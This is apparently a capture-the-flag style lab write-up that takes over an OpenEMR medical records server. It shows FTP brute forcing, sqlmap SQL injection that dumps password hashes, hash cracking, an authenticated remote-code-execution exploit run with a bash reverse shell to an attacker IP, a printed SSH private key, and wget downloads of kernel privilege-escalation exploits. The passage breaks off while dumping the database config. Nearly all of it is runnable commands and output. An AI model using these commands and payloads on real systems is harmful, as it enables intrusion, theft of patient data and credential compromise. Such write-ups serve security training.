WriteupsVHL — Records
WebMediumLinux
VHL — Records
OpenEMR medical records application. Exploited a pre-auth SQL injection CVE and file upload for shell access.
February 11, 2025Virtual Hacking Labs
#OpenEMR#SQLi#File Upload#CVE
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.30
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-11 17:22 EST
Nmap scan report for 10.11.1.30
Host is up (0.022s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:2f:00:ee:50:28:41:23:b5:a7:05:a8:be:98:4f:ab (RSA)
| 256 d5:b3:d8:3a:e7:df:4b:a0:1c:f8:52:78:07:b9:9c:6b (ECDSA)
|_ 256 d3:86:a0:97:da:d9:15:fe:1b:8b:f6:2c:20:0a:02:2f (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/11%OT=21%CT=1%CU=38661%PV=Y%DS=2%DC=I%G=Y%TM=67AB
OS:CDE2%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=109%TI=Z%II=I%TS=A)SEQ(S
OS:P=101%GCD=1%ISR=109%TI=Z%II=I%TS=A)SEQ(SP=102%GCD=1%ISR=109%TI=Z%II=I%TS
OS:=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5=M
OS:5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE
OS:88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=
OS:S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=N)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPC
OS:K=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 21.68 ms 10.11.1.30
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.29 seconds
21
sh
21/tcp open ftp vsftpd 3.0.3sh
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://10.11.1.30
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 17:24:20
[DATA] max 16 tasks per 1 server, overall 16 tasks, 66 login tries, ~5 tries per task
[DATA] attacking ftp://10.11.1.30:21/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 17:24:3780
sh
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: OpenEMR Login
|_Requested resource was interface/login/login.php?site=default
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ )directory search
sh
dirsearch -u http://10.11.1.30
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /home/sake/vhl/Records/reports/http_10.11.1.30/_25-02-11_17-33-53.txt
Target: http://10.11.1.30/
[17:33:53] Starting:
[17:33:55] 403 - 275B - /.ht_wsr.txt
[17:33:55] 403 - 275B - /.htaccess.bak1
[17:33:55] 403 - 275B - /.htaccess.sample
[17:33:55] 403 - 275B - /.htaccess.save
[17:33:55] 403 - 275B - /.htaccess.orig
[17:33:55] 403 - 275B - /.htaccess_orig
[17:33:55] 403 - 275B - /.htaccess_sc
[17:33:55] 403 - 275B - /.htaccessOLD
[17:33:55] 403 - 275B - /.htaccess_extra
[17:33:55] 403 - 275B - /.htaccessBAK
[17:33:55] 403 - 275B - /.htm
[17:33:55] 403 - 275B - /.html
[17:33:55] 403 - 275B - /.htaccessOLD2
[17:33:55] 403 - 275B - /.htpasswds
[17:33:55] 403 - 275B - /.htpasswd_test
[17:33:55] 403 - 275B - /.httr-oauth
[17:33:56] 403 - 275B - /.php
[17:34:01] 200 - 518B - /admin.php
[17:34:09] 200 - 4KB - /bower.json
[17:34:09] 200 - 1KB - /build.xml
[17:34:10] 200 - 509B - /ci/
[17:34:10] 200 - 455B - /cloud/
[17:34:10] 301 - 308B - /cloud -> http://10.11.1.30/cloud/
[17:34:11] 200 - 496B - /common/
[17:34:11] 301 - 309B - /common -> http://10.11.1.30/common/
[17:34:11] 200 - 3KB - /composer.json
[17:34:11] 301 - 309B - /config -> http://10.11.1.30/config/
[17:34:11] 200 - 475B - /config/
[17:34:11] 200 - 259KB - /composer.lock
[17:34:12] 200 - 3KB - /CONTRIBUTING.md
[17:34:12] 200 - 37B - /controller.php
[17:34:12] 200 - 651B - /controllers/
[17:34:12] 200 - 820B - /custom/
[17:34:13] 200 - 4KB - /docker-compose.yml
[17:34:18] 301 - 309B - /images -> http://10.11.1.30/images/
[17:34:18] 200 - 965B - /images/
[17:34:21] 301 - 310B - /library -> http://10.11.1.30/library/
[17:34:21] 200 - 34KB - /LICENSE
[17:34:24] 301 - 310B - /modules -> http://10.11.1.30/modules/
[17:34:24] 200 - 456B - /modules/
[17:34:30] 200 - 3KB - /portal/
[17:34:30] 301 - 309B - /portal -> http://10.11.1.30/portal/
[17:34:31] 301 - 309B - /public -> http://10.11.1.30/public/
[17:34:31] 200 - 467B - /public/
[17:34:32] 200 - 3KB - /README.md
[17:34:34] 403 - 275B - /server-status
[17:34:34] 403 - 275B - /server-status/
[17:34:34] 301 - 311B - /services -> http://10.11.1.30/services/
[17:34:34] 200 - 566B - /services/
[17:34:34] 200 - 673B - /setup.php
[17:34:35] 301 - 308B - /sites -> http://10.11.1.30/sites/
[17:34:36] 301 - 306B - /sql -> http://10.11.1.30/sql/
[17:34:36] 200 - 1KB - /sql/
[17:34:38] 200 - 603B - /templates/
[17:34:38] 301 - 312B - /templates -> http://10.11.1.30/templates/
[17:34:38] 200 - 505B - /tests/
[17:34:38] 301 - 308B - /tests -> http://10.11.1.30/tests/
[17:34:40] 200 - 0B - /vendor/autoload.php
[17:34:40] 200 - 0B - /vendor/composer/autoload_namespaces.php
[17:34:40] 200 - 0B - /vendor/composer/autoload_real.php
[17:34:40] 200 - 802B - /vendor/
[17:34:40] 200 - 0B - /vendor/composer/autoload_static.php
[17:34:40] 200 - 1KB - /vendor/composer/LICENSE
[17:34:40] 200 - 0B - /vendor/composer/autoload_psr4.php
[17:34:40] 200 - 1KB - /vendor/phpunit/phpunit/phpunit
[17:34:40] 200 - 0B - /vendor/composer/autoload_files.php
[17:34:40] 200 - 0B - /vendor/composer/ClassLoader.php
[17:34:40] 200 - 0B - /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
[17:34:40] 200 - 0B - /vendor/composer/autoload_classmap.php
[17:34:41] 200 - 241KB - /vendor/composer/installed.json
Task Completedhashcat
sh
hashcat -m 100 '9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684' /usr/share/wordlists/rockyou.txt
9d4e1e23bd5b727046a9e3b4b7db57bd8d6ee684:passcreds
admin:pass
openemr 5.0.1
admin.php
msfconsole openemr_sqli_dump
sh
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > options
Module options (auxiliary/sqli/openemr/openemr_sqli_dump):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.ht
ml
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /openemr yes The base path to the OpenEMR installation
VHOST no HTTP server virtual host
View the full module info with the info, or info -d command.
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > set rhosts 10.11.1.30
rhosts => 10.11.1.30
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > run
[*] Running module against 10.11.1.30
[-] Auxiliary aborted due to failure: not-vulnerable: The target does not seem vulnerable.
[*] Auxiliary module execution completed
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > set targeturi /
targeturi => /
msf6 auxiliary(sqli/openemr/openemr_sqli_dump) > run
[*] Running module against 10.11.1.30
openemr SQLi
-
https://www.rapid7.com/db/modules/auxiliary/sqli/openemr/openemr_sqli_dump/
-
searching through openemr schema
users_securetable holds authentication details
-
looking at the metasploit module
-
can turn this in to sqlmap
sqlmap
sh
sqlmap -u "http://10.11.1.30/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1" --batch --dbms=mysql -p from_id --level=5 --risk=3 --technique=B --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.9#stable}
|_ -| . ['] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 20:55:43 /2025-02-11/
[20:55:43] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('OpenEMR=8tob7acq3ur...4bdhigg4th'). Do you want to use those [Y/n] Y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: from_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: action=make_task&from_id=1'+(SELECT 0x71756578 WHERE 4806=4806 AND 3057=3057)+'&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1
---
[20:55:43] [INFO] testing MySQL
[20:55:43] [INFO] confirming MySQL
[20:55:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 or 20.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 8.0.0 (Aurora fork)
[20:55:43] [INFO] fetching database names
[20:55:43] [INFO] fetching number of databases
[20:55:43] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[20:55:43] [INFO] retrieved:
[20:55:43] [WARNING] reflective value(s) found and filtering out
2
[20:55:44] [INFO] retrieved: information
[20:56:27] [CRITICAL] connection timed out to the target URL. sqlmap is going to retry the request(s)
[20:56:27] [WARNING] unexpected response detected. Will use (extra) validation step in similar cases
[20:56:27] [WARNING] unexpected HTTP code '200' detected. Will use (extra) validation step in similar cases
_schema
[20:56:33] [INFO] retrieved: openemr
available databases [2]:
[*] information_schema
[*] openemrsh
sqlmap -u "http://10.11.1.30/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1" --batch --dbms=mysql -p from_id --level=5 --risk=3 --technique=B -D openemr --tables
Database: openemr
[234 tables]
+---------------------------------------+
| array |
| groups |
| log |
| version |
| addresses |
| amc_misc_data |
| amendments |
| amendments_history |
| ar_activity |
| ar_session |
| audit_details |
| audit_master |
| automatic_notification |
| background_services |
| batchcom |
| billing |
| calendar_external |
| categories |
| categories_seq |
| categories_to_documents |
| ccda |
| ccda_components |
| ccda_field_mapping |
| ccda_sections |
| ccda_table_mapping |
| chart_tracker |
| claims |
| clinical_plans |
| clinical_plans_rules |
| clinical_rules |
| clinical_rules_log |
| code_types |
| codes |
| codes_history |
| config |
| config_seq |
| customlists |
| dated_reminders |
| dated_reminders_link |
| direct_message_log |
| documents |
| documents_legal_categories |
| documents_legal_detail |
| documents_legal_master |
| drug_inventory |
| drug_sales |
| drug_templates |
| drugs |
| eligibility_response |
| eligibility_verification |
| employer_data |
| enc_category_map |
| erx_drug_paid |
| erx_narcotics |
| erx_rx_log |
| erx_ttl_touch |
| esign_signatures |
| extended_log |
| external_encounters |
| external_procedures |
| facility |
| facility_user_ids |
| fee_sheet_options |
| form_care_plan |
| form_clinical_instructions |
| form_dictation |
| form_encounter |
| form_eye_mag |
| form_eye_mag_dispense |
| form_eye_mag_impplan |
| form_eye_mag_orders |
| form_eye_mag_prefs |
| form_eye_mag_wearing |
| form_functional_cognitive_status |
| form_group_attendance |
| form_groups_encounter |
| form_misc_billing_options |
| form_observation |
| form_reviewofs |
| form_ros |
| form_soap |
| form_taskman |
| form_vitals |
| forms |
| gacl_acl |
| gacl_acl_sections |
| gacl_acl_seq |
| gacl_aco |
| gacl_aco_map |
| gacl_aco_sections |
| gacl_aco_sections_seq |
| gacl_aco_seq |
| gacl_aro |
| gacl_aro_groups |
| gacl_aro_groups_id_seq |
| gacl_aro_groups_map |
| gacl_aro_map |
| gacl_aro_sections |
| gacl_aro_sections_seq |
| gacl_aro_seq |
| gacl_axo |
| gacl_axo_groups |
| gacl_axo_groups_map |
| gacl_axo_map |
| gacl_axo_sections |
| gacl_groups_aro_map |
| gacl_groups_axo_map |
| gacl_phpgacl |
| geo_country_reference |
| geo_zone_reference |
| globals |
| gprelations |
| history_data |
| icd10_dx_order_code |
| icd10_gem_dx_10_9 |
| icd10_gem_dx_9_10 |
| icd10_gem_pcs_10_9 |
| icd10_gem_pcs_9_10 |
| icd10_pcs_order_code |
| icd10_reimbr_dx_9_10 |
| icd10_reimbr_pcs_9_10 |
| icd9_dx_code |
| icd9_dx_long_code |
| icd9_sg_code |
| icd9_sg_long_code |
| immunization_observation |
| immunizations |
| insurance_companies |
| insurance_data |
| insurance_numbers |
| issue_encounter |
| issue_types |
| lang_constants |
| lang_custom |
| lang_definitions |
| lang_languages |
| layout_group_properties |
| layout_options |
| lbf_data |
| lbt_data |
| list_options |
| lists |
| lists_touch |
| log_comment_encrypt |
| log_validator |
| medex_icons |
| medex_outgoing |
| medex_prefs |
| medex_recalls |
| misc_address_book |
| module_acl_group_settings |
| module_acl_sections |
| module_acl_user_settings |
| module_configuration |
| modules |
| modules_hooks_settings |
| modules_settings |
| multiple_db |
| notes |
| notification_log |
| notification_settings |
| onotes |
| onsite_documents |
| onsite_mail |
| onsite_messages |
| onsite_online |
| onsite_portal_activity |
| onsite_signatures |
| openemr_module_vars |
| openemr_modules |
| openemr_postcalendar_categories |
| openemr_postcalendar_events |
| openemr_postcalendar_limits |
| openemr_postcalendar_topics |
| openemr_session_info |
| patient_access_offsite |
| patient_access_onsite |
| patient_birthday_alert |
| patient_data |
| patient_portal_menu |
| patient_reminders |
| patient_tracker |
| patient_tracker_element |
| payment_gateway_details |
| payments |
| pharmacies |
| phone_numbers |
| pma_bookmark |
| pma_column_info |
| pma_history |
| pma_pdf_pages |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pnotes |
| prescriptions |
| prices |
| procedure_answers |
| procedure_order |
| procedure_order_code |
| procedure_providers |
| procedure_questions |
| procedure_report |
| procedure_result |
| procedure_type |
| product_registration |
| product_warehouse |
| registry |
| report_itemized |
| report_results |
| rule_action |
| rule_action_item |
| rule_filter |
| rule_patient_data |
| rule_reminder |
| rule_target |
| sequences |
| shared_attributes |
| standardized_tables_track |
| supported_external_dataloads |
| syndromic_surveillance |
| template_users |
| therapy_groups |
| therapy_groups_counselors |
| therapy_groups_participant_attendance |
| therapy_groups_participants |
| transactions |
| user_settings |
| users |
| users_facility |
| users_secure |
| valueset |
| voids |
| x12_partners |
+---------------------------------------+sh
sqlmap -u "http://10.11.1.30/interface/forms/eye_mag/taskman.php?action=make_task&from_id=1&to_id=1&pid=1&doc_type=1&doc_id=1&enc=1" --batch --dbms=mysql -p from_id --level=5 --risk=3 --technique=B -D openemr -T users_secure --dump
___
__H__
___ ___[(]_____ ___ ___ {1.9#stable}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
Database: openemr
Table: users_secure
[2 entries]
+----+--------------------------------+--------------------------------------------------------------+-------------+---------------------+---------------+---------------+-------------------+-------------------+
| id | salt | password | username | last_update | salt_history1 | salt_history2 | password_history1 | password_history2 |
+----+--------------------------------+--------------------------------------------------------------+-------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1 | $2a$05$0D9tdLH6yHrawC/bKZi/wy$ | $2a$05$0D9tdLH6yHrawC/bKZi/wu.VnpS2HCZsgrJyzlx2wbLrw0W6mjLY. | admin | 2021-03-29 07:44:58 | NULL | NULL | NULL | NULL |
| 4 | $2a$05$Ju5hhjtjjpagmKLsUUUazl$ | $2a$05$Ju5hhjtjjpagmKLsUUUazeet/U1GNwrZviIZ6BE8pgeaD/ofohKSy | emrvpsadmin | 2021-03-29 07:46:33 | NULL | NULL | NULL | NULL |
+----+--------------------------------+--------------------------------------------------------------+-------------+---------------------+---------------+---------------+-------------------+-------------------+hashcat
sh
hashcat -m 3200 '$2a$05$0D9tdLH6yHrawC/bKZi/wu.VnpS2HCZsgrJyzlx2wbLrw0W6mjLY.' /usr/share/wordlists/rockyou.txt
$2a$05$0D9tdLH6yHrawC/bKZi/wu.VnpS2HCZsgrJyzlx2wbLrw0W6mjLY.:zxcvbnsh
hashcat -m 3200 '$2a$05$Ju5hhjtjjpagmKLsUUUazeet/U1GNwrZviIZ6BE8pgeaD/ofohKSy' /usr/share/wordlists/rockyou.txt
$2a$05$Ju5hhjtjjpagmKLsUUUazeet/U1GNwrZviIZ6BE8pgeaD/ofohKSy:147258369creds
- both works
txt
admin:zxcvbn
emrvpsadmin:147258369OpenEMR 5.0.1.3 - Remote Code Execution (Authenticated)
sh
python2 45161.py -u admin -p zxcvbn -c 'bash -i >& /dev/tcp/172.16.1.1/1234 0>&1' http://10.11.1.30sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.30] 44642
bash: cannot set terminal process group (876): Inappropriate ioctl for device
bash: no job control in this shell
www-data@records:/var/www/html/interface/main$ whoami
whoami
www-datapassword reuse for emrvpsadmin
sh
www-data@records:/home$ su emrvpsadmin
su emrvpsadmin
Password: 147258369
whoami
emrvpsadminemrvpsadmin id_rsa
sh
emrvpsadmin@records:~/.ssh$ cat id_rsa
cat id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----sh
ssh -i id_rsa emrvpsadmin@10.11.1.30
emrvpsadmin@records:~$ whoami
emrvpsadminpriv esc
sh
emrvpsadmin@records:~$ uname -a
Linux records 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
emrvpsadmin@records:~$ cat /etc/os-release
NAME="Ubuntu"
VERSION="20.04.1 LTS (Focal Fossa)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 20.04.1 LTS"
VERSION_ID="20.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=focal
UBUNTU_CODENAME=focalsh
╔══════════╣ Sudo version
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version
Sudo version 1.8.31sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp6 0 0 :::21 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN - sh
╚══════════════════════╝
╔══════════╣ Useful software
/usr/bin/base64
/usr/bin/curl
/usr/bin/g++
/usr/bin/gcc
/usr/bin/make
/usr/bin/nc
/usr/bin/netcat
/usr/bin/perl
/usr/bin/php
/usr/bin/ping
/usr/bin/python3
/usr/bin/sudo
/usr/bin/wget
╔══════════╣ Installed Compilers
ii g++ 4:9.3.0-1ubuntu2 amd64 GNU C++ compiler
ii g++-9 9.3.0-17ubuntu1~20.04 amd64 GNU C++ compiler
ii gcc 4:9.3.0-1ubuntu2 amd64 GNU C compiler
ii gcc-9 9.3.0-17ubuntu1~20.04 amd64 GNU C compiler
/usr/bin/gccsh
╔══════════╣ MySQL version
mysql Ver 8.0.23-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))sh
Files with capabilities (limited to 50):
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/ping = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+epsh
emrvpsadmin@records:~$ wget http://172.16.1.1/50135.csh
emrvpsadmin@records:~$ gcc -o exploit 50135.clinux exploit suggester
sh
emrvpsadmin@records:~$ ./linux-exploit-suggester.sh
Available information:
Kernel version: 5.4.0
Architecture: x86_64
Distribution: ubuntu
Distribution version: 20.04
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
81 kernel space exploits
49 user space exploits
Possible Exploits:
[+] [CVE-2022-2586] nft_object UAF
Details: https://www.openwall.com/lists/oss-security/2022/08/29/5
Exposure: probable
Tags: [ ubuntu=(20.04) ]{kernel:5.12.13}
Download URL: https://www.openwall.com/lists/oss-security/2022/08/29/5/1
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2021-4034] PwnKit
Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
Exposure: probable
Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: mint=19,[ ubuntu=18|20 ], debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: probable
Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: probable
Tags: [ ubuntu=20.04 ]{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2022-32250] nft_object UAF (NFT_MSG_NEWSET)
Details: https://research.nccgroup.com/2022/09/01/settlers-of-netlink-exploiting-a-limited-uaf-in-nf_tables-cve-2022-32250/
https://blog.theori.io/research/CVE-2022-32250-linux-kernel-lpe-2022/
Exposure: less probable
Tags: ubuntu=(22.04){kernel:5.15.0-27-generic}
Download URL: https://raw.githubusercontent.com/theori-io/CVE-2022-32250-exploit/main/exp.c
Comments: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
Details: https://seclists.org/oss-sec/2017/q1/184
Exposure: less probable
Download URL: https://www.exploit-db.com/download/https://www.exploit-db.com/exploits/41154sh
wget https://raw.githubusercontent.com/aels/CVE-2022-2586-LPE/refs/heads/main/CVE-2022-2586.csh
emrvpsadmin@records:~$ wget http://172.16.1.1/CVE-2022-2586.csh
scp -i id_rsa -r CVE-2021-4034-main emrvpsadmin@10.11.1.30:/home/emrvpsadmindatabase config
sh
emrvpsadmin@records:/var/www/html/sites/default$ cat sqlconf.php
<?php
// OpenEMR
// MySQL Config
$host = 'localhost';
$port = '3306';
